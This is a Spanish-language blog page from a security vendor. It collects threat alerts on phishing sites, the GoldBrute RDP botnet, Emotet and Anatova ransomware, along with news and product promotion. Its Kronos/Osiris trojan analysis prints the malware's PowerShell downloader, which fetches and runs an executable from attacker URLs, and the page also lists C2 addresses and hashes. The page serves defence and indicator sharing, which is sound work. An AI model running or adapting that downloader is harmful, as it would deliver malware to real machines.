NOTIFICACIÓN EVENTOS DE AMENAZA> Eventos de phishing masivo reportados en Julio 2019

By | Sin categoría | No Comments

header jul 2019

Descripción del evento o vulnerabilidad

Nombre Evento/vulnerabilidad Numero de CVE (si aplica)
Phishing dirigido a teléfonos celulares N/A

En lo que va transcurrido del mes de julio, se han reportado diversos ataques vinculados al phishing como medio para la obtención de datos sensibles de empresas y/o usuarios particulares, y el posterior robo de dinero a los mismos.

Análisis

La campaña mas reciente reportada hace referencia a la suplantación de identidad de una entidad financiera internacional, Scotiabank. Los vectores de amenaza indican que el ataque se encuentra dirigido a teléfonos celulares, de modo que, si ingresamos al dominio web en un ordenador, el sitio (que se presentara como un sitio oficial de la entidad) nos indicara que la web solo funciona por medio de dispositivos móviles.

Si el usuario cae en la trampa, el sitio nos brindara la posibilidad de ingresar al homebanking en modo “empresa” o “persona”. Luego de esto, nos solicitara las credenciales de la cuenta con lo cual una vez ingresadas, el ataque habrá culminado y nuestros datos bancarios se encontraran en la base de datos del atacante.

PHISHING1

La información obtenida respecto a este caso indica que si bien el servidor web se encuentra dado de baja (Actualmente el sitio se encuentra inactivo) este podría ser puesto en funcionamiento en cualquier momento nuevamente, ya que el servidor aún continúa respondiendo. Debido a esto, se deberá tener sumo cuidado con cualquier tipo de correo proveniente de la entidad en la cual se nos indique un link explicito hacia un sitio.

IOC:

scotiasmss[.]com

www[.]scotiasmss[.]com

187[.]17[.]111[.]47

http://www[.]scotiasmss[.]com[/]choose[.]php

https:/www[.]scotiabankchile[.]cl-Scotiabank-Azul-home/?sid=x

Además, se ha identificado a través de los indicadores que el sitio se encuentra alojado en San Pablo, Brasil.

Un segundo caso reportado hace en el mes de julio, ubica a la empresa Movistar siendo víctima de suplantación de identidad a través de correos electrónicos los cuales solicitan al usuario credenciales bancarias con el argumento de otorgar un “reembolso” al usuario.  El correo solicita que este se ingrese a un sitio y se coloquen los datos bancarios para realizar la transacción.

PHISHING2

IOC:

http://www[.]movistarclientes[.]com

Tareas de mitigación

La mejor manera de combatir estos intentos de ataque es capacitar al usuario final para que el mismo logre identificar el fraude, pero, si bien esta es la manera ideal, siempre es necesario tener herramientas que apoyen a la causa ya sea dentro del contexto de una empresa o como usuario final. Existen herramientas de protección dedicadas que poseen la inteligencia suficiente como para identificar este tipo de ataques y web/correos maliciosos.

Conclusiones y recomendaciones

Si bien la detección de sitios falsos puede resultar un tanto difícil para usuarios comunes, se deben tener en cuenta una serie de aristas las cuales, para este y cualquier otro caso, ayudara a detectarlos:

1. Verificación de certificado SSL. Para verificar la existencia de este, debemos revisar en la parte superior del navegador, donde nos aparece el link del sitio donde estamos conectados. Una vez allí debemos verificar que el sitio comience con https://. Si el dominio comenzara con http:// es un indicador de que el sitio no está validado por una entidad certificadora en la cual cualquier navegador confié.

Toda entidad financiera por protocolos y normas deben tener este y más certificados para la comunicación web, es decir, si ingresamos a un dominio que creemos corresponde a un banco o entidad financiera, debe tener este certificado sin falta.

2. Comportamiento extraño. Debemos aprender a detectar los comportamientos o solicitudes incoherentes. ¿A que nos referimos al hablar de esto? Sitios de homebanking, de telefonía, ISP, etc, todos aquellos sitios que posean una instancia de registro o logon son potencialmente el destino de un intento de suplantación de identidad con el objetivo de capturar información de usuarios. Sin embargo, un sitio como los antes mencionados, nunca nos obligarían a utilizar el teléfono móvil como único medio de conexión, o nos solicitarían con urgencia ingresar datos críticos para salvaguardar alguna cuenta asociada ni por medio de un correo electrónico solicitarían datos de tarjetas de crédito o bancarios.

3. Desconfiar como primera medida. Si una página solicita datos sensibles sea de la persona o de la empresa, se debe desconfiar de la misma, y se debe realizar un análisis con la información antes mencionada. También es posible comunicarse con la entidad correspondiente por algún otro medio para consultar sobre la veracidad del sitio y el dominio oficial.

 

Los indicadores de compromiso extraídos:

  • scotiasmss[.]com
  • www[.]scotiasmss[.]com
  • 187[.]17[.]111[.]47
  • http://www[.]scotiasmss[.]com/choose[.]php
  • https:/www[.]scotiabankchile[.]cl-Scotiabank-Azul-home/?sid=x
  • lasherramientasexpress.es
  • herramientasexpress.es
  • lasherramientasexpress.com
  • herramientaexpress.es
  • abrilclimatizaciones.es
  • fitairs.es
  • humblebundles.es
  • martinclima.es
  • greenmangamings.es
  • decormara.es
  • nokeys.es
  • hrkgame.es
  • handtec.es
  • mobilefixtienda.es
  • movileos.com
  • simplygames.es
  • instantgaming.eu
  • instantgaming.co
  • may-movil.com
  • argosshop.es
  • may-movil.es
  • instantgamings.es
  • mrsneaker.es
  • 365games.es
  • toolstops.com
  • navia-center.es
  • mrmemory.co
  • kasmani-electrodomesticos.es
  • offtek.co
  • gamelooting.es
  • kinguins.com
  • gamyvo.com
  • movilines.co
  • xtralifes.com
  • entradasdechampions.com
  • mielectro.co
  • movil-planet.com
  • ssensetienda.com
  • press-starts.com

Fuentes

https://www.eldiariodelapampa.com.ar/index.php/portada/88-grilla/63078-el-banco-de-la-pampa-alerta-por-phishing

https://as.com/meristation/2019/07/05/betech/1562324312_153051.html

https://www.eleconomista.es/tecnologia/noticias/9974300/07/19/Movistar-avisa-de-una-campana-de-phishing-que-se-hace-pasar-la-compania.html

https://www.eleconomistaamerica.cl/telecomunicacion-tecnologia-cl/noticias/9978426/07/19/Chile-es-el-tercer-pais-de-America-Latina-mas-afectado-por-ataques-de-por-phishing-en-2018.html

https://www.theclinic.cl/2019/07/03/chile-aparece-entre-los-10-paises-mas-vulnerables-al-phishing-del-mundo/

https://searchdatacenter.techtarget.com/es/opinion/Las-campanas-de-phishing-evolucionan-en-2019

Para más información sobre como proteger tu información sobre esta y otras amenzas, no dudes en contactarnos: expertos@ransecurity.com

Las Organizaciones distribuidas y el fin de las puertas de enlace web tradicionales. Documento Técnico.

By | Sin categoría | No Comments

IBOSS Mailing2

A medida que las empresas se distribuyen más, necesitan tener visibilidad sobre todos sus usuarios y garantizar la seguridad más allá del perímetro. Confiar en las soluciones heredadas de puertas de enlace web seguras ya no es técnica ni económicamente factible.

Te compartimos esta lectura muy recomendada: Las Organizaciones distribuidas y el fin de las puertas de enlace web tradicionales” en este documento técnico de iboss™ descubrirás cómo las Organizaciones han cambiado de operaciones centralizadas a operaciones distribuidas y qué significa ese cambio desde la perspectiva de la ciberseguridad.

También explica las deficiencias entre soluciones de puerta de enlace web segura tradicionales, híbridas y completamente en la nube. Por último, presenta el enfoque Distributed Gateway Platform de iboss™, que redefine la manera en la que se proporcionan y se administran las puertas de enlace web seguras.

Para más información sobre como proteger tu información en la nube, no dudes en contactarnos: expertos@ransecurity.com

Seguridad en la nube bajo sus términos. Documento.

By | Sin categoría | No Comments

IBOSS Mailing1

La tendencia creciente de usuarios y dispositivos móviles, sumado a los beneficios en cuanto a costos y escalabilidad de la nube han hecho que la migración de la información a estas plataformas esté en aumento, impactando a empresas de todos los sectores.

Sin embargo, existen muchas zonas grises como el hecho de que los datos de la organización podrían estar vulnerables en una nube pública y surgen preguntas como:

  • ¿Qué pasa con las vulnerabilidades de una SSL abierta, por ejemplo, cuando el servidor OpenSSL comparte un hipervisor con otros clientes en la misma nube?
  • ¿Cómo se gestiona la seguridad de las máquinas virtuales que se encuentren funcionando bajo el mismo hipervisor?.
  • ¿Cómo proteger eficazmente la información, dispositivos y usuarios más allá de la red?

Por lo anterior te compartimos el documento: “Seguridad de la nube bajo sus términos” elaborado por Iboss™, este documento muy concreto de 5 páginas, aborda los desafíos de ciberseguridad en la nube y explica cómo funciona la arquitectura de contenedores de nodo. DESCARGAR

Esperamos que sea de utilidad. Ante cualquier consulta sobre este tema, no dudes en contactaron: expertos@ransecurity.com

NOTIFICACION EVENTOS DE AMENAZA> Botnet Brute Force RDP Servers

By | Sin categoría | No Comments

notificacion

Descripción del evento o vulnerabilidad

 

Nombre Evento/vulnerabilidad Numero de CVE (si aplica)
Botnet aprovecha vulnerabilidad RDP CVE-2019-0708

Se descubrió una botnet (GoldBrute) que utiliza la vulnerabilidad de RDP correspondiente al CVE-2019-0708, para realizar ataques de fuerza bruta y ampliar su rango de acción.

Botnet es el nombre genérico que denomina a cualquier grupo de PC infectados y controlados por un atacante de forma remota. Generalmente, un hacker o un grupo de ellos crea un botnet usando un malware que infecta a una gran cantidad de máquinas. Los ordenadores son parte del botnet, llamados “bots” o “zombies”. No existe un número mínimo de equipos para crear un botnet.

 

Análisis

La botnet GoldBrute está controlada por un solo servidor de comando y control (104.156.249.231). Los bots están intercambiando datos con él a través de conexiones WebSocket encriptadas AES al puerto 8333.

A un sistema infectado se le indicará primero que descargue el código del bot. La descarga es muy grande (80 MBytes) e incluye el runtime completo de Java. El propio bot se implementa en una clase de Java llamada “GoldBrute”.

El bot comenzará a escanear direcciones IP aleatorias para encontrar más hosts con servidores RDP expuestos para luego devolver estas direcciones IP al servidor de C&C. Después de que el bot reportó 80 nuevas víctimas, el servidor asignará un conjunto de objetivos para la fuerza bruta al bot.

rrr

Tareas de mitigación

Para mitigar esta amenaza se debe de aplicar las recomendaciones explicadas en el siguiente punto, las cuales contienen recomendaciones generales en base al comportamiento obtenido, además de contener indicadores de compromiso mediante los cuales se puede dar mayor precisión a las mejoras.

 

Conclusiones y recomendaciones

  • Para la prevención de esta amenaza se recomienda bloquear las siguientes IP,
  • 248.167.144 (desde donde se descarga el archivo ZIP)
  • 156.249.231:8333 (Servidor C2)
  • Realizar bloqueos por medio de directivas del siguiente hash el cual corresponde a un ejecutable encubierto como .dll: af07d75d81c36d8e1ef2e1373b3a975b9791f0cca231b623de0b2acd869f264e (bitcoin.dll)

By EQUIPO RAN SOC

+info: expertos@ransecurity.com

Modelos predictivos e I.A. anticipan Anatova con 1042 días

By | Sin categoría | No Comments

anatova

Desde Enero de este año, se han visto varias noticias en referencia a una amenaza llamada Anatova.
Muchos investigadores y analistas la han considerado como sofisticada.
Varios fabricantes hicieron eco de la noticia:

Blog de McAfee:  https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/

TechRadar:  https://www.techradar.com/news/anatova-is-a-nasty-new-ransomware-that-targets-gamers

SCMedia:  https://www.scmagazine.com/home/security-news/fresh-faced-anatova-ransomware-created-by-skilled-developers-researchers-warn/
Al ser verificado el HASH original de la amenaza en diferentes blogs de investigación, la mayoría de los productos de seguridad tradicional de Endpoint lo han detectado:
SHA-256: 170fb7438316f7335f34fa1a431afc1676a786f1ad9dee63d78c3f5efd3a0ac0

Nombre de archivo: CallOfCthulhu.exe

Tamaño del archivo: 307 KB

En una prueba de laboratorio se decidió empaquetar esta amenaza (Con un empaquetador sencillo, que se consigue fácilmente en Internet de forma gratuita) como parte de una prueba para verificar como se comportan los productos de Endpoint tradicionales frente a esas modificaciones.

SHA-256: 83A898C022B56161206394B49CF6B09FB0F0F174EB75848FAB08828EA11E1384

Nombre de archivo: Anatova_Protected.exe

Tamaño del archivo: 1,732 KB

Se comprobó una vez más que la mayoría de productos tradicionales de Endpoint no detectan la amenaza después del proceso de empaquetado, siendo vulnerables al ataque.
Y los productos de Endpoint que muestran la detección, lo hacen porque identifican en sus firmas el empaquetador utilizado mas no la amenaza, conllevando eso a falsos positivos de archivos legítimos empaquetados con dicha herramienta.
Se probó este archivo modificado de Anatova Ransomware con CylancePROTECT y los resultados muestran que Cylance está previniendo esta amenaza sofisticada desde marzo de 2016, sin actualizaciones, sin conexión a Internet y ejecución previa:

SHA256: 83A898C022B56161206394B49CF6B09FB0F0F174EB75848FAB08828EA11E1384

BLOCK -0.998353 : OFFLINE by Dalek model, agent 1450 and above
(Publicado 2017-02-06) 729 dias hasta la fecha.

BLOCK -0.889682 : OFFLINE by Cyborg model, from agent 1380 to 1440
(Publicado 2016-03-29) 1042 dias hasta la fecha.
Predicción: 29 de marzo de 2016 (1042 días antes de la publicación de la noticia)

Este es otro ejemplo del poder de la prevención, modelos predictivos y cómo la Inteligencia Artificial puede hacer posible la prevención.

Si tiene alguna pregunta, no dude en comunicarse con cualquiera de nuestro equipo.

Por: Julian Jimenez Yory – jjimenezyory@ransecurity.com

Gran comienzo de 2019 (para los hackers)

By | noticias, Sin categoría | No Comments

blogg 01

Este año recién comienza y tardó sólo unas horas en traernos un nuevo titular sobre una brecha de seguridad. Los datos de unos 30.000 empleados del gobierno australiano fueron expuestos (fuente), según la información pública disponible, y nadie seguramente se esperaba esto, debido a un ataque de Phishing a uno de sus empleados…

Poco tiempo después siguen arribando las noticias, los titulares y esto, es nada más que la punta del Iceberg.

A mediados de enero, se publicó en MEGA (mejor conocido como Megaupload hace unos años) una de las colecciones más grandes de direcciones de correo y contraseñas hasta ahora reportada, llamada “Collection #1” (fuente) que contiene 2,692,818,238 de registros, un número que algunos usaríamos para exagerar…

La información dentro de esta colección pareciera provenir de varias brechas ocurridas en el pasado, pero, lo que más llama la atención, es que las 772,904,991 direcciones de correo y 21,222,975 de contraseñas, están en texto plano.

Si todavía no lo hiciste, te recomendamos que pases por HaveIBeenPwned el lugar que se encargó de recopilar estos datos y verifiques si tu dirección de correo o contraseña, están dentro de esta u otras bases de datos.

Este servicio, es una de las tantas integraciones preconfiguradas dentro de Demisto, que podrías estar utilizando de manera automática para generar Playbooks y orquestar todas tus herramientas de seguridad desde un solo lugar.

Como dijimos antes, hay que tener en cuenta que esto es sólo la punta del Iceberg. Lo que vemos es algún descuido de alguien con información privilegiada o un entusiasta compartiendo datos en algún foro popular de hacking, uno sólo puede suponer, que es lo que realmente está circulando en los sitios más profundos de Internet, para esto necesitaríamos un grupo especializado de analistas, una buena táctica para estar alertas y una plataforma que nos permita estar vigilantes.

Por esto, combinando nuestro SOC de próxima generación, junto a nuestros partners, Digital Shadows y Anomali, te ofrecemos ampliar tu visión sobre la exposición digital de tu organización, empleados, ejecutivos y todos los datos expuestos en Internet para tener una alerta temprana ante la aparición de sus datos en brechas de seguridad, sitios de la Deep y Dark web, menciones en redes sociales y cualquier otro dato que podría indicar que alguien está intentando comprometer tu compañía, tiene las armas para hacerlo o ya lo hizo.

Por: Matias Espindola – mespindola@ransecurity.com

¡Emotet ataca de nuevo!

By | noticias, Sin categoría | No Comments

EMOTET

Después de meses de baja actividad, se ha detectado una nueva campaña de la familia de troyanos bancarios similares  a un gusano: Emotet, este troyano polimórfico es distribuido mediante campañas masivas de SPAM, usualmente se camufla como un e-mail legítimo con adjuntos Word y/o PDF simulando ser facturas, notificaciones de pago, alertas de cuentas bancarias, etc, ejecuta macros para descargarse y ejecutarse, estableciendo persistencia en la máquina infectada, y reportando el compromiso exitoso a un servidor C&C es utilizado como un downloader o dropper para payloads secundarios potencialmente más dañinos.

RECOMENDACIONES: 

Te recomendamos revisar este instructivo para conocer como configurar reglas en Clearswift Secure Email Gateway 4.x y como crear reglas de protección en McAfee Email Gateway 7.x para protegerte frente a este tipo de amenazas.

Por: Pablo Schivo – pschivo@ransecurity.com

Moody’s incluirá “riesgos de ciberseguridad” en calificaciones

By | noticias, Sin categoría | No Comments

MODDYS

Moody’s, la agencia calificadora de inversiones, anunció recientemente la inclusión de los riesgos de ciberseguridad para su proceso de calificaciones de crédito, proceso a través del cual serán comparados los riesgos de robos de datos masivos que una organización podría enfrentar. Esta medida no pudo llegar en mejor momento, y se mantienen expectación sobre el papel que la calificadora pueda desempeñar.

En esta nueva misión será fundamental para Moody’s crear un sistema que recopile datos completos y confiables, incluyendo información tomada de las propias compañías, así como de fuentes externas.

Acorde a expertos en seguridad en redes, hay dos métodos para obtener esta información. En primer lugar, la calificadora puede recurrir a los datos de proveedores externos que realicen evaluaciones de ciberseguridad. Como segundo método de recopilación de información, están los datos resguardados por las propias empresas, obtenidos a través de herramientas y monitoreo interno.

Los datos externos serán más valiosos para algunas empresas que para otras. Una gran cadena de minoristas, por ejemplo, con una presencia importante en el mercado, será más propensa a abarcar una mayor superficie de ciberataques.

Moody’s podría exigir a las compañías cualquier información interna que necesite como parte de su alcance de trabajo. Aunque en la práctica, no hay garantía de que una compañía proporcione una imagen completa de sus operaciones. Una compañía podría negar el acceso de Moody’s a cierta información debido a sus propias políticas de seguridad.

Sin embargo, Moody’s debe solventar estas limitantes con creatividad. Los datos externos proporcionan cobertura para un segmento crucial de la red de una empresa y sirven para verificar la posibilidad de que ésta no esté brindando información clara y completa a la calificadora. Por su parte, la información interna es la principal fuente de información detallada de una compañía.

El próximo desafío para Moody’s será desarrollar esas fuentes de datos, pues se originarán de múltiples fuentes trabajando con diferentes conceptos y formatos que no necesariamente son consistentes entre sí, por lo que la unificación de criterios para analizar los riesgos cibernéticos en organizaciones de diferentes ramos será fundamental para Moody’s, consideran expertos en seguridad en redes.

Finalmente, la calidad de la información que Moody’s pueda recopilar tendrá un impacto directo en la calidad de sus calificaciones. Si Moody’s puede construir una plataforma que integra los datos de los proveedores internos y externos, podrá crear una calificación confiable mucho más rápido y de manera más fiable.

Para muchos expertos en campos como las finanzas o la ciberseguridad, la decisión de Moody’s no pudo llegar en un mejor momento. Hemos llegado al punto en el que ya no nos sorprenden los incidentes de violaciones masivas de datos, por lo que es necesario que las organizaciones consideren las consecuencias que un incidente de esta magnitud puede generar.

FUENTE: 

 

https://noticiasseguridad.com/seguridad-informatica/moodys-incluira-riesgos-de-ciberseguridad-en-calificaciones-de-credito-empresarial/

Ataques de suplantación de identidad a empresas alimenticias en Chile

By | noticias, Sin categoría | No Comments

bec

Recientemente se han detectado una serie de ataques de suplantación de identidad usando el nombre de reconocidas empresas del sector alimenticio en Chile.

Las técnicas más utilizadas para esto fueron:

BEC (Vulneración de correo electrónico Corporativo): Esta amenaza está diseñada para engañar a la víctima a fin de que piense que recibió un mensaje de un alto ejecutivo de su empresa, como el CEO o el CFO, en el cual se le pide que haga una transferencia de dinero fuera de la empresa (por lo general) o de información sensible, de interés para el atacante, como formularios con datos de salarios e impuestos.

Domain Squatting: es la practica mediante la cual los atacantes registran y usan dominios que suplantan compañías, organizaciones, marcas e incluso personas. Estos dominios suelen ser una variante mal escrita o bajo otro sufijo de internet (.com à .org à .xyz)

Spoofing: es la creación de mensajes de correo electrónico con una dirección de remitente falso. Es fácil de hacer porque los protocolos básicos no tienen ningún mecanismo de autenticación. Se puede llevar a cabo desde dentro de una LAN o desde un entorno externo.

 

RECOMENDACIONES

  • Hay que asegurar que todos tus dominios de correo tengan propiamente configurados DNS, SPF, DKIM o DMARC.

Estar atentos ante:

  • Solicitudes de Ejecutivos de alto nivel que piden información no habitual.
  • Solicitudes que intentan rodear los canales habituales de pago o transferencias.
  • Errores ortográficos ya sea en el cuerpo del correo o dominios de imitación que engañen a los destinatarios a simple vista (por ejemplo: sud0minio.com en lugar de sudominio.com).
  • Direcciones de respuesta no concuerda con la del remitente
  • Enlaces que lleven a sitios sospechosos

 

APRENDE A PREVENIR EL FRAUDE DIGITAL Y A PROTEGER A TUS CLIENTES CON NOSOTROS

Contamos con soluciones que monitorean, manejan y remedian riesgos digitales a través de la más amplia variedad de fuentes de datos dentro de la web ya sea Open, Deep o Dark web para proteger la organización, su marca, reputación y clientes, ante riesgos como:

  • Exposición de datos tanto interna como a través de proveedores
  • Usuarios VIP: Violación de marcas personales en redes sociales e información personal expuesta por los individuos o terceras partes.
  • Exposición de infraestructura: Certificados débiles y expirados, vulnerabilidades, puertos abiertos y más.
  • Amenazas físicas: Amenazas físicas a sus oficinas o miembros clave del staff que se planearon o se están planeando
  • Exposición de la marca: Perfiles falsos de redes sociales, dominios de Phishing, bienes de contrabando.
  • Ciberamenazas: Ransomware, contexto alrededor de los actores maliciosos, planeamiento de ataques de denegación de servicio, etc.

SOLUCIONES RECOMENDADAS

Anomali_Logo_BlackBlue-RGB-01

digital-shadows_owler_20160227_010735_original

PROOFPOINT PNG

Más información y consultas: expertos@ransecurity.com

UPDATE! Variante del Troyano Kronos (Osiris) peligroso troyano bancario

By | noticias, Sin categoría | No Comments

 

osiris

Desde nuestro SOC, seguimos analizando el comportamiento de la variante del troyano Kronos, la misma se conoce como Osiris.

 

ANÁLISIS Y COMPORTAMIENTO

Este es un troyano bancario tiene el siguiente comportamiento:

Utiliza inyecciones web G/P/L estilo Zeus, un keylogger para registrar las pulsaciones del teclado y un servidor VNC, aunque también presenta algunas peculiaridades, como el cifrado del tráfico para pasarlo por la red Tor hacia el servidor de mando y control.

La nueva variante del troyano kronos detectada y analizado por el S.O.C el dia 02/10, es un malware troyano polimórfico (cambia automáticamente su código cada cierto tiempo o con acciones determinadas del dispositivo), haciendo que sea más difícil para los antivirus detectar su firma, anteriormente este malware se consideraba del tipo bancario debido a su comportamiento, hoy en día está integrado con varias funciones maliciosas debido que consta de varios módulos que descarga de su servidor C&C(comando y control).

El principal medio de difusión utilizado es el spam mediante e-mail, adjuntando documentos de Microsoft Word o RTF específicamente diseñados con macros, los cuales tienen código malicioso powershell encriptado que descarga el malware y luego lo ejecuta. Utiliza la vulnerabilidad CVE-2017-11882, un desbordamiento de buffer conocido de Microsoft Office, permitiendo al hacker llevar a cabo una ejecución de código arbitrario sobre la máquina objetivo.

Detalles del archivo:

  • Nombre del archivo: Nuevo-contrato.doc
  • Tamaño del archivo: 128768 bytes
  • Tipo de archivo: Microsoft Office Word
  • MD5: 84ef0539de8e8b8f062b379ec603017b

RECOMENDACIONES:

Instalar el parche de de seguridad de Microsoft Office: https://www.microsoft.com/en-us/download/details.aspx?id=56250

Verificar si hay tráfico hacia los siguientes dominios, en caso tal, realizar un bloqueo de los mismos ya que es la manera de comunicación:

  • http://avast.dongguanmolds.com/abc.123
  • 28.14.219
  • 215.247.106

Tener el SO Actualizado a la ultima versión y con todos los parches de seguridad.

DNS Requests

Recomendamos bloquear las conexiones hacia la siguiente dirección:

studio2321.com

Response: A 69.163.216.158

HTTP Requests

Recomendamos aplicar bloqueos del proxy de navegación a las siguientes URLs:

URL: http://studio2321.com:9040/9QT9H0mr

DATA: GET /9QT9H0mr HTTP/1.1 Host: studio2321.com Connection: Keep-Alive

URL: http://studio2321.com:9040/9QT9H0mr/

DATA: GET /9QT9H0mr/ HTTP/1.1 Host: studio2321.com

URL: http://74.89.23.180:7080/

DATA: GET / HTTP/1.1

Cookie: 64048=mEe4DhPslSvzR+7C1uNb/1Qs26pFPDBHIgA7GMSXHm5435WfiV7EKFn6sHHsIqqHn D+cswdvXeMge+Wav7rcmQASvkiOsZrPdEaiCOjgL7g1JGwWGYqJwtTzvRy9nHbbs8h2oKV75I E+lYevrz4mDk9nUv9aEx19Mp2b79z8rqN53ysfUe3TVyIHCK4sZjDM8m9w764YMo4L1nZoqkkx lqLF2nsWWk2ovZ05ceP92f7eRs3+mjj2OeyEy0IFkGi+sbUfFGYwCRAGvJAYKl5UbOQNXNQnx Yvq73mHfnuHt3U97276yA/YAFSNyvoUbg3UbEjSeOMtx5q7J+PdDr5qQubURXmKeFBjMWgw 6lrfAtIqpYNiO2hjU7msFNIP9bt91f9lUL2yV2phbjBXpPCVSUEHLQLTQsMrn/4YRJBsZYDzYP5 N Host: 74.89.23.180:7080

Connection: Keep-Alive

Cache-Control: no-cache

URL: http://sightspansecurity.com/2aw9z1o

URL: http://landersmadden.com/mm405kH

URL: http://kingaardvark.com/HJJbLFNs

URL: http://interconformity.com/uMvDH9lmnH

URL: http://grupoembatec.com/2IH19v0

URL: http://motiondev.com.br/nmbSJF8d3O/

URL: http://aile.pub/VijPdPci/

URL: http://gidamikrobiyoloji.com/qMXm2AO/

URL: http://perkasa.undiksha.ac.id/wp-content/uploads/taTj65QDg/

 

CONOCE COMO PROTEGERTE:

Clientes SOC RAN: Si sos cliente de nuestro SOC ya estas protegido.

Clientes con Cylance: Están protegidos teniendo habilitada la política Fase 3 (AutoCuarentenamiento, Protección de Memoria y Control de Script).

Clientes con Proofpoint

Están protegidos a través del del Sandboxing y Heurística del producto.

Clientes con ClearSwift: 
Se recomienda el bloqueo de extensiones potencialmente peligrosas (.DOC, .DOCX, .XLS, etc).  Informando al usuario final la cuarentena del archivo para pedir la liberación bajo demanda previo análisis.

Cliente con McAfee: 
Se encuentran protegidos si tienen configurado correctamente el entorno TIE y ATD. De lo contrario es necesario cargar el extraDAT. consúltanos para más información.

Si tienes dudas al respecto no dudes en contactarnos más información y consultas: expertos@ransecurity.com 

 

MAS DATOS DE LA AMENAZA: 

El documento adjunto que contiene este troyano cuenta con un script embebido, que al ejecutarse, genera una conexión hacia las URLs del atacante para descargar un archivo que luego de su ejecución en el equipo de la víctima, genera la creación de los servicios y procesos maliciosos que recopilan la información que luego será enviada al atacante.

Código ejecutado:

  • powershell $mXP=new-object Net.WebClient;$QiV=’http://studio2321.com/9QT9H0mr@http://aile.pub/VijPdPci@http://motiondev.com.br/nmbS
  • JF8d3O@http://perkasa.undiksha.ac.id/wp-content/uploads/taTj65QDg@http://gidamikrobiyoloji.com/qMXm2AO’.Split(‘@’);$zwq= ‘532’;$ILh=$env:public+’\’+$zwq+’.exe';foreach($tpd in $QiV){try{$mXP.DownloadFile($tpd, $ILh);Invoke-Item $ILh;break;}catch{}}
  • C:\Users\Public\532.exe
  • “C:\Windows\SysWOW64\iwamregtaupe.exe”

Servicios creados

  • iwamregtaupe

Servicios iniciados

  • iwamregtaupe

Procesos

  • EXE PID: 360, Parent PID: 1240
  • exe PID: 1928, Parent PID: 360
  • exe PID: 2080, Parent PID: 1928
  • exe PID: 2308, Parent PID: 2080
  • exe PID: 2400, Parent PID: 2308
  • exe PID: 484, Parent PID: 388
  • exe PID: 2656, Parent PID: 484

 

Más información y consultas: expertos@ransecurity.com

CONTACTO

E-mail: Soporte técnico: helpdesk@ransecurity.com Info: expertos@ransecurity.com
RANSecurity Argentina: (+54 11) 5353 9999
RANSecurity Chile: Tel: (+562) 3223 9532
RANSecurity Perú: Tel: (+51 1) 711 4764